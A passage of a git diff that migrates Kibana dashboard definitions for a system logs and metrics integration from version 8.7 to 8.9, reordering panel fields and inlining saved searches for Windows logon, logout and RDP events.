"39724444-251e-480d-b5f2-642362f8929e", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", "embeddableConfig": { "attributes": { "references": [], @@ -3296,21 +3402,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 7, - "i": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", - "w": 9, - "x": 18, + "h": 23, + "i": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", + "w": 21, + "x": 27, "y": 49 }, - "panelIndex": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", "embeddableConfig": { "attributes": { "references": [ @@ -3563,21 +3670,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 23, - "i": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", - "w": 21, - "x": 27, - "y": 49 - }, - "panelIndex": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", - "title": "Event Distribution in time [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Event Distribution in time [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", + "w": 9, + "x": 0, + "y": 72 + }, + "panelIndex": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", "embeddableConfig": { "attributes": { "references": [], @@ -3687,21 +3795,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", + "i": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", "w": 9, - "x": 0, + "x": 9, "y": 72 }, - "panelIndex": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", "embeddableConfig": { "attributes": { "references": [], @@ -3811,21 +3920,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", + "i": "9c593d0d-c730-4277-ae74-ac3134055800", "w": 9, - "x": 9, + "x": 18, "y": 72 }, - "panelIndex": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "9c593d0d-c730-4277-ae74-ac3134055800", "embeddableConfig": { "attributes": { "references": [], @@ -3935,21 +4045,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "9c593d0d-c730-4277-ae74-ac3134055800", + "i": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", "w": 9, - "x": 18, - "y": 72 + "x": 0, + "y": 95 }, - "panelIndex": "9c593d0d-c730-4277-ae74-ac3134055800", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", "embeddableConfig": { "attributes": { "references": [], @@ -4059,21 +4170,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", + "i": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", "w": 9, - "x": 0, + "x": 9, "y": 95 }, - "panelIndex": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", "embeddableConfig": { "attributes": { "references": [], @@ -4183,21 +4295,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", + "i": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", "w": 9, - "x": 9, + "x": 18, "y": 95 }, - "panelIndex": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", "embeddableConfig": { "attributes": { "references": [], @@ -4307,31 +4420,16 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 7, - "i": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", - "w": 9, - "x": 18, - "y": 95 - }, - "panelIndex": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", - "title": "", - "type": "lens", - "version": "8.7.0" + "title": "" } ], "timeRestore": false, "title": "[System Windows Security] User Management Events", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-71f720f0-ff18-11e9-8405-516218e3d268", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -4423,16 +4521,6 @@ "name": "20:84460bff-f94b-4d8b-a166-5ab188df891c", "type": "index-pattern" }, - { - "id": "system-7e178c80-fee1-11e9-8405-516218e3d268", - "name": "22:panel_22", - "type": "search" - }, - { - "id": "system-324686c0-fefb-11e9-8405-516218e3d268", - "name": "23:panel_23", - "type": "search" - }, { "id": "logs-*", "name": "33:indexpattern-datasource-layer-c613d393-dc99-42e4-a4f0-afb124b56634", @@ -4487,7 +4575,29 @@ "id": "logs-*", "name": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa:9863d407-89f7-419e-ac97-2dd548e76e0b", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "22:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "22:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "23:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "23:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json b/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json index f8a9a47641d..258fe96fedb 100644 --- a/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json +++ b/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json @@ -1,4 +1,15 @@ { + "id": "system-79ffd6e0-faa0-11e6-947f-177f697178b8", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNiwxXQ==", "attributes": { "description": "Overview of host metrics", "kibanaSavedObjectMeta": { @@ -4911,10 +4922,6 @@ "title": "[Metrics System] Host overview", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-06T15:07:11.967Z", - "id": "system-79ffd6e0-faa0-11e6-947f-177f697178b8", - "managed": false, "references": [ { "id": "metrics-*", @@ -5097,6 +5104,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json b/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json index f2703cb7c7a..bae46daa915 100644 --- a/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json +++ b/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json @@ -1,4 +1,15 @@ { + "id": "system-Logs-syslog-dashboard", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNywxXQ==", "attributes": { "description": "Syslog dashboard from the Logs System integration", "kibanaSavedObjectMeta": { @@ -522,10 +533,6 @@ "title": "[Logs System] Syslog dashboard", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T18:39:32.591Z", - "id": "system-Logs-syslog-dashboard", - "managed": false, "references": [ { "id": "logs-*", @@ -558,6 +565,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-Metrics-system-overview.json b/packages/system/kibana/dashboard/system-Metrics-system-overview.json index 192c1889f45..07b5302c89f 100644 --- a/packages/system/kibana/dashboard/system-Metrics-system-overview.json +++ b/packages/system/kibana/dashboard/system-Metrics-system-overview.json @@ -1,4 +1,15 @@ { + "id": "system-Metrics-system-overview", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyOCwxXQ==", "attributes": { "description": "Overview of system metrics", "kibanaSavedObjectMeta": { @@ -1865,10 +1876,6 @@ "title": "[Metrics System] Overview", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-06T12:48:08.579Z", - "id": "system-Metrics-system-overview", - "managed": false, "references": [ { "id": "metrics-*", @@ -1946,6 +1953,7 @@ "type": "dashboard" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-Windows-Dashboard.json b/packages/system/kibana/dashboard/system-Windows-Dashboard.json index b9772f6f927..7a900127d04 100644 --- a/packages/system/kibana/dashboard/system-Windows-Dashboard.json +++ b/packages/system/kibana/dashboard/system-Windows-Dashboard.json @@ -1,4 +1,15 @@ { + "id": "system-Windows-Dashboard", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyOSwxXQ==", "attributes": { "description": "Overview of all Windows Event Logs.", "kibanaSavedObjectMeta": { @@ -108,6 +119,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "a631db29-cb48-4bfb-b9c9-77ea2baff486", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "a631db29-cb48-4bfb-b9c9-77ea2baff486", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -130,21 +151,22 @@ "title": "User Logon Dashboard [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 5, - "i": "a631db29-cb48-4bfb-b9c9-77ea2baff486", + "h": 20, + "i": "f1073adc-88c7-4213-947d-72d05705e81a", "w": 12, "x": 0, - "y": 0 + "y": 5 }, - "panelIndex": "a631db29-cb48-4bfb-b9c9-77ea2baff486", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "f1073adc-88c7-4213-947d-72d05705e81a", "embeddableConfig": { "attributes": { "references": [ @@ -202,21 +224,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 20, - "i": "f1073adc-88c7-4213-947d-72d05705e81a", - "w": 12, - "x": 0, - "y": 5 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "f1073adc-88c7-4213-947d-72d05705e81a", - "title": "Number of Events [Windows Overview]", - "type": "lens", - "version": "8.7.0" + "title": "Number of Events [Windows Overview]" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", + "w": 36, + "x": 12, + "y": 0 + }, + "panelIndex": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -239,21 +262,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 5, - "i": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", + "h": 20, + "i": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", "w": 36, "x": 12, - "y": 0 + "y": 5 }, - "panelIndex": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", "embeddableConfig": { "attributes": { "references": [ @@ -411,21 +435,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Number of Events Over Time By Channel [Windows Overview]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", - "w": 36, - "x": 12, - "y": 5 + "i": "49364a81-aad0-4123-9b41-e29cc0d20211", + "w": 16, + "x": 0, + "y": 25 }, - "panelIndex": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", - "title": "Number of Events Over Time By Channel [Windows Overview]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "49364a81-aad0-4123-9b41-e29cc0d20211", "embeddableConfig": { "attributes": { "references": [ @@ -531,20 +556,21 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} - }, + "enhancements": {}, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "49364a81-aad0-4123-9b41-e29cc0d20211", + "i": "24dc70bf-961d-43d5-bbaf-b596523308d8", "w": 16, - "x": 0, + "x": 16, "y": 25 }, - "panelIndex": "49364a81-aad0-4123-9b41-e29cc0d20211", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "24dc70bf-961d-43d5-bbaf-b596523308d8", "embeddableConfig": { "attributes": { "references": [ @@ -643,20 +669,21 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} - }, + "enhancements": {}, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "24dc70bf-961d-43d5-bbaf-b596523308d8", + "i": "8f939618-5923-43d4-9b23-57f7d21b4908", "w": 16, - "x": 16, + "x": 32, "y": 25 }, - "panelIndex": "24dc70bf-961d-43d5-bbaf-b596523308d8", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "8f939618-5923-43d4-9b23-57f7d21b4908", "embeddableConfig": { "attributes": { "references": [ @@ -755,30 +782,15 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} - }, - "gridData": { - "h": 20, - "i": "8f939618-5923-43d4-9b23-57f7d21b4908", - "w": 16, - "x": 32, - "y": 25 - }, - "panelIndex": "8f939618-5923-43d4-9b23-57f7d21b4908", - "type": "lens", - "version": "8.7.0" + "enhancements": {}, + "type": "lens" + } } ], "timeRestore": false, "title": "[System] Windows Overview", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-Windows-Dashboard", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -811,5 +823,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json b/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json index 8cd88e122fb..040bc8157e1 100644 --- a/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json +++ b/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json @@ -1,4 +1,15 @@ { + "id": "system-bae11b00-9bfc-11ea-87e4-49f31ec44891", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEzMCwxXQ==", "attributes": { "description": "User logon activity dashboard.", "kibanaSavedObjectMeta": { @@ -81,6 +92,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 28, + "i": "1", + "w": 18, + "x": 0, + "y": 34 + }, + "panelIndex": "1", "embeddableConfig": { "attributes": { "references": [ @@ -294,20 +315,21 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} - }, + "enhancements": {}, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 28, - "i": "1", + "h": 18, + "i": "3", "w": 18, "x": 0, - "y": 34 + "y": 16 }, - "panelIndex": "1", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "3", "embeddableConfig": { "attributes": { "references": [ @@ -444,21 +466,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Administrator Users [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "visualization", "gridData": { - "h": 18, - "i": "3", - "w": 18, + "h": 6, + "i": "4", + "w": 12, "x": 0, - "y": 16 + "y": 0 }, - "panelIndex": "3", - "title": "Administrator Users [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "4", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -481,23 +504,48 @@ "title": "User Logon Dashboard [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 6, - "i": "4", - "w": 12, - "x": 0, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "4", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "winlog.logon.type", + "source.domain", + "source.ip", + "winlog.logon.id" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":{\"query\":\"4624\"},\"type\":\"phrase\"},\"query\":{\"match\":{\"event.code\":{\"query\":\"4624\",\"type\":\"phrase\"}}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "User Logons [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 46, @@ -507,12 +555,21 @@ "y": 62 }, "panelIndex": "10", - "panelRefName": "panel_10", "title": "Logon Details", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 6, + "i": "34fc9633-8a7c-444d-8d19-06095b55fb43", + "w": 36, + "x": 12, + "y": 0 + }, + "panelIndex": "34fc9633-8a7c-444d-8d19-06095b55fb43", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -535,21 +592,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 6, - "i": "34fc9633-8a7c-444d-8d19-06095b55fb43", - "w": 36, - "x": 12, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "34fc9633-8a7c-444d-8d19-06095b55fb43", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 10, + "i": "f2925b5d-a820-428f-83dc-a547186bcbe6", + "w": 9, + "x": 0, + "y": 6 + }, + "panelIndex": "f2925b5d-a820-428f-83dc-a547186bcbe6", "embeddableConfig": { "attributes": { "references": [], @@ -623,21 +681,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 10, - "i": "f2925b5d-a820-428f-83dc-a547186bcbe6", + "i": "b6b45344-9881-4adf-ae69-4b892d976e63", "w": 9, - "x": 0, + "x": 9, "y": 6 }, - "panelIndex": "f2925b5d-a820-428f-83dc-a547186bcbe6", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "b6b45344-9881-4adf-ae69-4b892d976e63", "embeddableConfig": { "attributes": { "references": [], @@ -711,21 +770,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 10, - "i": "b6b45344-9881-4adf-ae69-4b892d976e63", - "w": 9, - "x": 9, + "h": 13, + "i": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", + "w": 30, + "x": 18, "y": 6 }, - "panelIndex": "b6b45344-9881-4adf-ae69-4b892d976e63", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", "embeddableConfig": { "attributes": { "references": [], @@ -889,21 +949,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Logon Events Timeline" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 13, - "i": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", - "w": 30, + "h": 15, + "i": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", + "w": 15, "x": 18, - "y": 6 + "y": 19 }, - "panelIndex": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", - "title": "Logon Events Timeline", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", "embeddableConfig": { "attributes": { "references": [ @@ -1037,21 +1098,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Logon Types [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", + "i": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", "w": 15, - "x": 18, + "x": 33, "y": 19 }, - "panelIndex": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", - "title": "Logon Types [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", "embeddableConfig": { "attributes": { "references": [ @@ -1218,23 +1280,48 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", - "w": 15, - "x": 33, - "y": 19 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", - "title": "Logon Sources [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Logon Sources [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "source.domain", + "source.ip", + "winlog.logon.id", + "event.action" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4778\",\"4779\"],\"type\":\"phrases\",\"value\":\"4778, 4779\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4778\"}},{\"match_phrase\":{\"event.code\":\"4779\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Remote Interactive Connections and Disconnections [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 28, @@ -1244,12 +1331,21 @@ "y": 34 }, "panelIndex": "454bb008-9720-455e-8ab9-b2f47d25aa4f", - "panelRefName": "panel_454bb008-9720-455e-8ab9-b2f47d25aa4f", "title": "RDP Reconnections and Desconnections", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 28, + "i": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", + "w": 12, + "x": 36, + "y": 34 + }, + "panelIndex": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", "embeddableConfig": { "attributes": { "references": [ @@ -1469,23 +1565,54 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 28, - "i": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", - "w": 12, - "x": 36, - "y": 34 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", - "title": "Logon with Explicit Credentials [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Logon with Explicit Credentials [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "user.domain", + "winlog.logon.id", + "event.action", + "winlog.logon.type", + "winlog.event_data.SubjectUserName" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":{\"query\":\"4625\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"event.code\":\"4625\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\",\"key\":\"winlog.provider_name\",\"negate\":false,\"params\":{\"query\":\"Microsoft-Windows-Security-Auditing\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"winlog.provider_name\":\"Microsoft-Windows-Security-Auditing\"}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "User Logouts [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 46, @@ -1495,22 +1622,15 @@ "y": 62 }, "panelIndex": "28115147-8399-4fcd-95ce-ed0a4f4239e3", - "panelRefName": "panel_28115147-8399-4fcd-95ce-ed0a4f4239e3", "title": "Logout Details", "type": "search", - "version": "8.7.0" + "version": "8.0.0" } ], "timeRestore": false, "title": "[System Windows Security] User Logons", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": 